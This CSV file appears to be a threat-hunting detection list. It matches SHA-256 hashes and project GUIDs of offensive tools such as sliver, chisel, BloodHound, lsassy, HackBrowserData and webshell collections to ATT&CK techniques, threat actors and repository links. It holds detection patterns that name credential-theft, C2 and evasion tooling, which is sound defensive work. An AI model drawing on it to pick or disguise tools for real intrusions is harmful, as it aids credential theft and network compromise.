"*040f67227ccb5fad854663f4162556c6c154d2ef4c0465e62d0ccef37ac4637a*",".{0,1000}040f67227ccb5fad854663f4162556c6c154d2ef4c0465e62d0ccef37ac4637a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","20946"
"*041a1f05935a0aae4c4073a55cb9ddd0f356f3f9d5b9fd2355d6332961a226a5*",".{0,1000}041a1f05935a0aae4c4073a55cb9ddd0f356f3f9d5b9fd2355d6332961a226a5.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","#filehash","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","20948"
"*04211dce315cd4a178578452d67ed6cb281073f05d70ad51b758131171b1a072*",".{0,1000}04211dce315cd4a178578452d67ed6cb281073f05d70ad51b758131171b1a072.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","0","#filehash","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","20949"
"*0421df6cf7ecab2db20777414d571ce0daeffb52edf58ff6fb873826c4a1f6ad*",".{0,1000}0421df6cf7ecab2db20777414d571ce0daeffb52edf58ff6fb873826c4a1f6ad.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","20950"
"*0426de410fb8ce32eefd563d24f81f5227bbb5a283a729bfd6b36adc50aed7f3*",".{0,1000}0426de410fb8ce32eefd563d24f81f5227bbb5a283a729bfd6b36adc50aed7f3.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","20951"
"*042BF22B-7728-486B-B8C9-D5B91733C46D*",".{0,1000}042BF22B\-7728\-486B\-B8C9\-D5B91733C46D.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","20952"
"*042BF22B-7728-486B-B8C9-D5B91733C46D*",".{0,1000}042BF22B\-7728\-486B\-B8C9\-D5B91733C46D.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","20953"
"*042BF22B-7728-486B-B8C9-D5B91733C46D*",".{0,1000}042BF22B\-7728\-486B\-B8C9\-D5B91733C46D.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","20954"
"*042BF22B-7728-486B-B8C9-D5B91733C46D*",".{0,1000}042BF22B\-7728\-486B\-B8C9\-D5B91733C46D.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","20955"
"*042BF22B-7728-486B-B8C9-D5B91733C46D*",".{0,1000}042BF22B\-7728\-486B\-B8C9\-D5B91733C46D.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","20956"
"*042BF22B-7728-486B-B8C9-D5B91733C46D*",".{0,1000}042BF22B\-7728\-486B\-B8C9\-D5B91733C46D.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","20957"
"*042BF22B-7728-486B-B8C9-D5B91733C46D*",".{0,1000}042BF22B\-7728\-486B\-B8C9\-D5B91733C46D.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","20958"
"*042BF22B-7728-486B-B8C9-D5B91733C46D*",".{0,1000}042BF22B\-7728\-486B\-B8C9\-D5B91733C46D.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","20959"
"*042BF22B-7728-486B-B8C9-D5B91733C46D*",".{0,1000}042BF22B\-7728\-486B\-B8C9\-D5B91733C46D.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","20960"
"*042BF22B-7728-486B-B8C9-D5B91733C46D*",".{0,1000}042BF22B\-7728\-486B\-B8C9\-D5B91733C46D.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","20961"
"*042BF22B-7728-486B-B8C9-D5B91733C46D*",".{0,1000}042BF22B\-7728\-486B\-B8C9\-D5B91733C46D.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","20962"
"*042BF22B-7728-486B-B8C9-D5B91733C46D*",".{0,1000}042BF22B\-7728\-486B\-B8C9\-D5B91733C46D.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","20963"
"*042BF22B-7728-486B-B8C9-D5B91733C46D*",".{0,1000}042BF22B\-7728\-486B\-B8C9\-D5B91733C46D.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","20964"
"*042BF22B-7728-486B-B8C9-D5B91733C46D*",".{0,1000}042BF22B\-7728\-486B\-B8C9\-D5B91733C46D.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","20965"
"*042BF22B-7728-486B-B8C9-D5B91733C46D*",".{0,1000}042BF22B\-7728\-486B\-B8C9\-D5B91733C46D.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","20966"
"*042BF22B-7728-486B-B8C9-D5B91733C46D*",".{0,1000}042BF22B\-7728\-486B\-B8C9\-D5B91733C46D.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","20967"
"*0430a3e7a1c50c8b42d5129089ca7f31a28d0b4a9aeda7a96a1d686fde52a9e4*",".{0,1000}0430a3e7a1c50c8b42d5129089ca7f31a28d0b4a9aeda7a96a1d686fde52a9e4.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","20969"
"*04318d1196862e1078e431e6d59dfeafba540d0369346dcfc6432a30d9c37e54*",".{0,1000}04318d1196862e1078e431e6d59dfeafba540d0369346dcfc6432a30d9c37e54.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","20970"
"*0434b626258ae9832074c8693921e3252a1804e506e555b5053f0793fc9e6f09*",".{0,1000}0434b626258ae9832074c8693921e3252a1804e506e555b5053f0793fc9e6f09.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","20971"
"*04387d7368c1a46d5dc11600b888fbe5890e30a793019d408bde0565a6a3dadb*",".{0,1000}04387d7368c1a46d5dc11600b888fbe5890e30a793019d408bde0565a6a3dadb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","20972"
"*0439628816cabe113315751e7113a9e9f720d7e499ffdd78acbac1ed8ba35887*",".{0,1000}0439628816cabe113315751e7113a9e9f720d7e499ffdd78acbac1ed8ba35887.{0,1000}","offensive_tool_keyword","Smbtouch-Scanner","Smbtouch detect whether the target is vulnerable of one of these vulnerabilities: ETERNALBLUE - ETERNALCHAMPION - ETERNALROMANCE - ETERNALSYNERGY","T1210 - T1046 - T1133","TA0007 - TA0043 - TA0008","N/A","APT15 - Turla","Lateral Movement","https://github.com/3gstudent/Smbtouch-Scanner","1","0","#filehash","N/A","10","2","140","66","2021-04-17T01:42:06Z","2017-04-21T01:38:55Z","20973"
"*043EE329-C00A-4F67-971F-BF1C55D4BC1A*",".{0,1000}043EE329\-C00A\-4F67\-971F\-BF1C55D4BC1A.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#GUIDproject","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","20975"
"*0446fc8138dc27bc571d777f43ba7a98d204df0abccef47f527bf58e86101880*",".{0,1000}0446fc8138dc27bc571d777f43ba7a98d204df0abccef47f527bf58e86101880.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","20978"
"*044a89d16d46ab63e3995828135ff95fc8553a99938874213e59000e1c1e2283*",".{0,1000}044a89d16d46ab63e3995828135ff95fc8553a99938874213e59000e1c1e2283.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","20979"
"*045fca6b1696d9b40dc71999c384458f32e4c7164c8d91370020694547b60e15*",".{0,1000}045fca6b1696d9b40dc71999c384458f32e4c7164c8d91370020694547b60e15.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","20982"
"*0461e84f847489e8968b011128b6be6b001f487ae75b2a0c14ff6d4eafc9f2df*",".{0,1000}0461e84f847489e8968b011128b6be6b001f487ae75b2a0c14ff6d4eafc9f2df.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","20983"
"*04628de68152672ff3ddfb372e1daa31b2f124ac79f98f245913522da3675468*",".{0,1000}04628de68152672ff3ddfb372e1daa31b2f124ac79f98f245913522da3675468.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","20984"
"*046338ae257f50edaf408a9fed37dc44065e6deb200fab64fef45aba785f7e69*",".{0,1000}046338ae257f50edaf408a9fed37dc44065e6deb200fab64fef45aba785f7e69.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","20985"
"*04645bb3fda6ec6c11bb22f4f053751ff7e07c145d4d8e1391651ac6a0ee851c*",".{0,1000}04645bb3fda6ec6c11bb22f4f053751ff7e07c145d4d8e1391651ac6a0ee851c.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in  to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","#filehash","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","20986"
"*046f321f30d2f6bedac62cdb099784f631bab5c68621e9e94fb81fea532da3a7*",".{0,1000}046f321f30d2f6bedac62cdb099784f631bab5c68621e9e94fb81fea532da3a7.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","20987"
"*046f841782518838690b1ad7916ea33c68cd32cfdd9c87aabc7d85425b0f20ed*",".{0,1000}046f841782518838690b1ad7916ea33c68cd32cfdd9c87aabc7d85425b0f20ed.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","20988"
"*0472A393-9503-491D-B6DA-FA47CD567EDE*",".{0,1000}0472A393\-9503\-491D\-B6DA\-FA47CD567EDE.{0,1000}","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","0","#GUIDproject","N/A","9","2","188","38","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z","20990"
"*048c215b812c16ffa4d64a8f3da77e2418457e7d8eb89b2716bdb65f176a665a*",".{0,1000}048c215b812c16ffa4d64a8f3da77e2418457e7d8eb89b2716bdb65f176a665a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","20994"
"*049003aa4e196b115dd292dcb19a0308b45bfc160344a2f18edb537800b9d38e*",".{0,1000}049003aa4e196b115dd292dcb19a0308b45bfc160344a2f18edb537800b9d38e.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","20995"
"*0492b9ad7ae35ee1e0b6f53a6b7c2c75e9b5d427*",".{0,1000}0492b9ad7ae35ee1e0b6f53a6b7c2c75e9b5d427.{0,1000}","offensive_tool_keyword","PowerLess","PowerShell-based modular backdoor that has been used by Magic Hound group","T1560 - T1217 - T1059.001 - T1005 - T1074.001 - T1140 - T1573 - T1105 - T1056.001","TA0011 - TA0009 - TA0010 - TA0005 - TA0002 - TA0006","N/A","Magic Hound","Malware","https://gist.github.com/farzinenddo/bb1f1ecb56aa9326abc7b47fc99e588e","1","0","#filehash","N/A","10","4","N/A","N/A","N/A","N/A","20996"
"*04991e2f282b817df64efc7d76e57068f36993903e59c03acf05286cddbb75ff*",".{0,1000}04991e2f282b817df64efc7d76e57068f36993903e59c03acf05286cddbb75ff.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","20999"
"*049ab1e5eef6dbfb0cfe81f8eac287d82db549369edf2992916d9c8109528159*",".{0,1000}049ab1e5eef6dbfb0cfe81f8eac287d82db549369edf2992916d9c8109528159.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","21000"
"*04a57cd7fa95b8851ef4d45aa6b30b9c89dbbbe7b8a1780a15c34b9a81f9ef91*",".{0,1000}04a57cd7fa95b8851ef4d45aa6b30b9c89dbbbe7b8a1780a15c34b9a81f9ef91.{0,1000}","offensive_tool_keyword","ShimMe","Injects a DLL into a suspended process running as SYSTEM via the OfficeClickToRun service for privilege escalation - Shim Injector: Injects a DLL into a process by modifying shim data in memory without creating or registering new SDB files to evade detection.","T1055 - T1053 - T1548.002 - T1078 - T1546 - T1070","TA0004 - TA0005 - TA0006 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/ShimMe","1","0","#filehash","N/A","9","2","140","20","2024-10-29T07:33:38Z","2024-08-04T10:03:28Z","21001"
"*04b631a3a34dae8fc3ead9204c21c2267aa91d516327453b588708c8c819c891*",".{0,1000}04b631a3a34dae8fc3ead9204c21c2267aa91d516327453b588708c8c819c891.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","21003"
"*04b76edf1ba46b49f42c67669dbc807e550682709c977665c0c7b37d2bb5e0d2*",".{0,1000}04b76edf1ba46b49f42c67669dbc807e550682709c977665c0c7b37d2bb5e0d2.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","21004"
"*04b99fb5cc1d91b1752fbcb2446db71083ab87af59dd9e0d940cc2ed5a65ef49*",".{0,1000}04b99fb5cc1d91b1752fbcb2446db71083ab87af59dd9e0d940cc2ed5a65ef49.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","#filehash","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","21005"
"*04c8a0077ac2c4db41e2bba0b7052fb1d0b492a6e301853b3e189223a989e1c7*",".{0,1000}04c8a0077ac2c4db41e2bba0b7052fb1d0b492a6e301853b3e189223a989e1c7.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","21006"
"*04ca7e137e1e9feead96a7df45bb67d5ab3de190*",".{0,1000}04ca7e137e1e9feead96a7df45bb67d5ab3de190.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","21007"
"*04d10aaec0489662bc61d17ed9d1e5b7a89a74faeedb428d1f80395feafef4c9*",".{0,1000}04d10aaec0489662bc61d17ed9d1e5b7a89a74faeedb428d1f80395feafef4c9.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21008"
"*04d10bef7b5d5a3c16782bc908ec5ea1ceacf33588c12d65ee4d314f6133d0f7*",".{0,1000}04d10bef7b5d5a3c16782bc908ec5ea1ceacf33588c12d65ee4d314f6133d0f7.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","21009"
